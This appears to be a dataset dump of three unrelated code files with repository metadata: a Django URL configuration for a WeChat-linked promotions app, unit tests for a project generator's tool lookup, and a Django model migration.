41198becb05ab22236b9b3bdf21e9420dac201c3 | bf3e0c392b198dee8ca2c0d192ba335634e49841 | /TOS_Pyramid/urls.py | 0e63dc5b8ce10b3f1a1974067f4b5f55350f58b6 | [] | no_license | swolfod/TOS_Promotions | 88b6b652a2697d1f72591c1d24ee0387b564b834 | b856a69f50be4d1339591d2314c04f0186ab8023 | refs/heads/master | 2020-06-14T10:54:44.850828 | 2016-12-19T15:10:48 | 2016-12-19T15:10:48 | 75,193,124 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,555 | py | """TOS_Pyramid URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/1.9/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.conf.urls import url, include
2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))
"""
from django.conf.urls import *
from .views import *
from WechatApi.views import mpAuthCallback
urlpatterns = [
url(r'^wechat/', include('WechatApi.urls')),
url(r'^admin/login/$', adminAuth, name="TOS_Pyramid.views.adminAuth"),
url(r'^admin/$', admin, name="TOS_Pyramid.views.admin"),
url(r'^admin/exports/$', exportPromotions, name="TOS_Pyramid.views.exportPromotions"),
url(r'^search-organization/$', ajSearchOrganization, name="TOS_Pyramid.views.ajSearchOrganization"),
url(r'^apply-tos/(\w+)/$', applyTOSBeta, name="TOS_Pyramid.views.applyTOSBeta"),
url(r'^approve-application/$', ajApproveApplication, name="TOS_Pyramid.views.ajApproveApplication"),
url(r'^bind-code/(\w+)/$', bindCode, name="TOS_Pyramid.views.bindCode"),
url(r'^share/(\d+)/$', shareCode, name="TOS_Pyramid.views.shareCode"),
url(r"^auth/wechat/$", mpAuthCallback, name="PortalWechatCallback"),
]
| [
"swolfod@gmail.com"
] | swolfod@gmail.com |
fe248a58af72904eff8d0fedd647865fd6adbf8c | 730e19d657be1021911189976140ab149ecd43ef | /tests/test_tools_supported.py | 95a053c3fe802f02cc02067f90a8bd1cbcafde3d | [
"Apache-2.0"
] | permissive | theotherjimmy/project_generator | f0368e9200d6d0f1c58061111889f5b8077b2766 | 38293572bb67ce86c365f1422ed71f50e98bff44 | refs/heads/master | 2020-05-01T04:28:51.467962 | 2016-05-17T12:29:54 | 2016-05-17T12:29:54 | 59,320,642 | 0 | 0 | null | 2016-05-20T19:23:23 | 2016-05-20T19:23:23 | null | UTF-8 | Python | false | false | 4,421 | py | # Copyright 2015 0xc0170
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from unittest import TestCase
from project_generator.tools_supported import ToolsSupported
from project_generator.tools.uvision import Uvision
from project_generator.tools.iar import IAREmbeddedWorkbench
from project_generator.tools.coide import Coide
from project_generator.tools.gccarm import MakefileGccArm
from project_generator.tools.eclipse import EclipseGnuARM
from project_generator.tools.sublimetext import SublimeTextMakeGccARM
from project_generator.tools.cmake import CMakeGccArm
from project_generator.tools.visual_studio import VisualStudioMakeGCCARM, VisualStudioGDB
class TestProject(TestCase):
"""test things related to the ToolsSupported class"""
def setUp(self):
self.tools = ToolsSupported()
def tearDown(self):
pass
def test_tools(self):
tool = self.tools.get_tool('uvision4')
assert tool == Uvision
tool = self.tools.get_tool('iar')
assert tool == IAREmbeddedWorkbench
tool = self.tools.get_tool('coide')
assert tool == Coide
tool = self.tools.get_tool('gcc_arm')
assert tool == MakefileGccArm
tool = self.tools.get_tool('eclipse_make_gcc_arm')
assert tool == EclipseGnuARM
tool = self.tools.get_tool('sublime_make_gcc_arm')
assert tool == SublimeTextMakeGccARM
tool = self.tools.get_tool('cmake_gcc_arm')
assert tool == CMakeGccArm
tool = self.tools.get_tool('visual_studio_make_gcc_arm')
assert tool == VisualStudioMakeGCCARM
def test_alias(self):
tool = self.tools.get_tool('uvision')
assert tool == Uvision
tool = self.tools.get_tool('iar')
assert tool == IAREmbeddedWorkbench
tool = self.tools.get_tool('make_gcc')
assert tool == MakefileGccArm
tool = self.tools.get_tool('gcc_arm')
assert tool == MakefileGccArm
tool = self.tools.get_tool('sublime_text')
assert tool == SublimeTextMakeGccARM
tool = self.tools.get_tool('sublime')
assert tool == SublimeTextMakeGccARM
tool = self.tools.get_tool('visual_studio')
assert tool == VisualStudioMakeGCCARM
tool = self.tools.get_tool('eclipse')
assert tool == EclipseGnuARM
def test_toolnames(self):
names = self.tools.get_toolnames('uvision')
assert 'uvision' == names[0]
toolchain = self.tools.get_toolchain('uvision')
assert 'uvision' == toolchain
names = self.tools.get_toolnames('uvision4')
assert 'uvision' == names[0]
toolchain = self.tools.get_toolchain('uvision4')
assert 'uvision' == toolchain
names = self.tools.get_toolnames('iar_arm')
assert 'iar_arm' == names[0]
toolchain = self.tools.get_toolchain('iar_arm')
assert 'iar' == toolchain
names = self.tools.get_toolnames('coide')
assert 'coide' == names[0]
toolchain = self.tools.get_toolchain('coide')
assert 'gcc_arm' == toolchain
names = self.tools.get_toolnames('make_gcc_arm')
assert 'make_gcc_arm' == names[0]
toolchain = self.tools.get_toolchain('make_gcc_arm')
assert 'gcc_arm' == toolchain
names = self.tools.get_toolnames('eclipse_make_gcc_arm')
assert 'eclipse_make_gcc_arm' == names[0]
toolchain = self.tools.get_toolchain('eclipse_make_gcc_arm')
assert 'gcc_arm' == toolchain
names = self.tools.get_toolnames('sublime_make_gcc_arm')
assert 'sublime_make_gcc_arm' == names[0]
toolchain = self.tools.get_toolchain('sublime_make_gcc_arm')
assert 'gcc_arm' == toolchain
names = self.tools.get_toolnames('cmake_gcc_arm')
assert 'cmake_gcc_arm' == names[0]
toolchain = self.tools.get_toolchain('cmake_gcc_arm')
assert 'gcc_arm' == toolchain
| [
"c0170@rocketmail.com"
] | c0170@rocketmail.com |
de3cfa892809354f4a40f6130fb666da36aed795 | e360c04043bf7e1ac7158f508c39f7ea7fa2f9b3 | /Content/migrations/0001_initial.py | 1af820a3032eaed33db1cd27391e50fdb3b08bfe | [] | no_license | kinetiz/testapp | 875253650e54abfa598a4e60b50535b8bc341ce9 | 848f82d2aacb11ef01d3b7f096154626eeab4029 | refs/heads/master | 2021-09-28T23:32:11.949088 | 2019-12-05T13:49:50 | 2019-12-05T13:49:50 | 226,079,949 | 0 | 0 | null | 2021-09-22T18:05:15 | 2019-12-05T10:52:02 | Python | UTF-8 | Python | false | false | 615 | py | # Generated by Django 3.0 on 2019-12-03 14:15
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='form',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('attraction_name', models.CharField(max_length=255)),
('description', models.TextField()),
('is_landmark', models.BooleanField(default=False)),
],
),
]
| [
"thanadon.f@gmail.com"
] | thanadon.f@gmail.com |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.